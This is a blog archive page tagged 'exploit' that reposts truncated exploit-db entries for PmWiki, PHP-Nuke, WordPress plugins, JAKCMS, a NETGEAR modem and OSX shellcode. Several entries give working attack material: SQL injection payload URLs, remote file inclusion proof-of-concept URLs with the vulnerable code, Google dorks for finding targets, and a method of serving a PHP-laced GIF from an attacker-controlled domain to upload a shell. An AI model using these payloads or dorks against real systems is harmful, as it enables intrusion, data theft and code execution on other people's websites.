Browsed by
Tag: exploit

PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit

PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit

<?php /*     ————————————————————-     PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit     ————————————————————-          author……………: Egidio Romano aka EgiX     mail……………..: n0b0d13s[at]gmail[dot]com     software link……..: http://www.pmwiki.org/     affected versions….: from 2.0.0 to 2.2.34          +————————————————————————-+     | This proof of concept code was written for educational purpose only.    |     | Use it at your own risk. Author will be not responsible for any damage. |     +————————————————————————-+          [-] vulnerable code in PageListSort() function defined into /scripts/pagelist.php          452.      $code = ”;     453.      foreach($opt[‘=order’] as…

Read More Read More

PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection

PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection

#!/usr/bin/perl # [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection # Date: 2010.07.04 after 50 days the bug was discovered. # Author/s: Dante90, WaRWolFz Crew # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, #               Shades Master, V1R5, yeat # Special Greetings To: The:Paradox # Greetings To: Shotokan-The Hacker, _mRkZ_, h473 # Web Site: www.warwolfz.org # My Wagend (Dante90): dante90wwz.altervista.org # —- # Why have I decided to publish this? # Because some nice guys (Dr.0rYX and…

Read More Read More

WordPress jetpack plugin SQL Injection Vulnerability

WordPress jetpack plugin SQL Injection Vulnerability

###################################################### # Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability # Date: 2011-19-11 # Author: longrifle0x # software: WordPress # Download:http://wordpress.org/extend/plugins/jetpack/ # Tools: SQLMAP ###################################################### *DESCRIPTION Discovered a vulnerability in  jetpack, WordPress Plugin, vulnerability is SQL injection. File:wp-content/plugins/jetpack/modules/sharedaddy.php Exploit: id=-1; or 1=if *Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user=’None’ LIMIT 0,1)=’Y’) THEN 1 ELSE 0 END) http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][MID((VERSION()),1,6)   Fonte: http://www.exploit-db.com/exploits/18126/

OSX universal ROP shellcode Testado no SNOW LEOPARD

OSX universal ROP shellcode Testado no SNOW LEOPARD

; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don’t want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; – put your ‘normal’ shellcode in x64_shellcode.asm ; – make ; – ./sc ; ; if you want to test: ; – uncomment lea rsp, [rel rop_stage0] / ret ; – make ; – nc -l 4444 ; – ./sc ; – you…

Read More Read More

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

Sense of Security – Security Advisory – SOS-11-011 Release Date. 20-Sep-2011 Last Update. – Vendor Notification Date. 22-Mar-2011 Product. NETGEAR Wireless Cable Modem Gateway CG814WG Affected versions. Hardware 1.03, Software V3.9.26 R14 verified, possibly others Severity Rating. High Impact. Authentication bypass, Cross Site Request Forgery Attack Vector. Remote without authentication Solution Status. Upgrade to R15 (by contacting NETGEAR) CVE reference. Not yet assigned Details. The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by ISP’s as customer premises equipment within…

Read More Read More

JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 Fonte: http://www.exploit-db.com/exploits/17882/

Multiple WordPress Plugin timthumb.php Vulnerabilites

Multiple WordPress Plugin timthumb.php Vulnerabilites

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) — Description — The following WordPress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com and then providing it to the script through the src GET parameter, it is possible to upload a shell and execute arbitrary code on the…

Read More Read More

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested) — PoC — http://SERVER/dbunixwp_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI — Vulnerable Code — // Move folder request handled when called by GET AJAX if (isset($_GET[‘ru_folder’])) { // WP setup and function access define(‘dbunixwp_USE_THEMES’, false); require_once(urldecode($_GET[‘abspath’]).’/wp-load.php’); // save us looking for it, it’s passed as a GET parameter Fonte: http://www.exploit-db.com/exploits/17869/

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested) — PoC — http://SERVER/dbunixwp_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work) — Vulnerable Code — if (isset($_FILES[‘wpmm-upload’])) { // Create WordPress environmnt require_once(urldecode($_REQUEST[‘abspath’]) . ‘wp-load.php’); // Handle attachment WPMiniMail::wpmm_upload(); } Fonte: http://www.exploit-db.com/exploits/17868/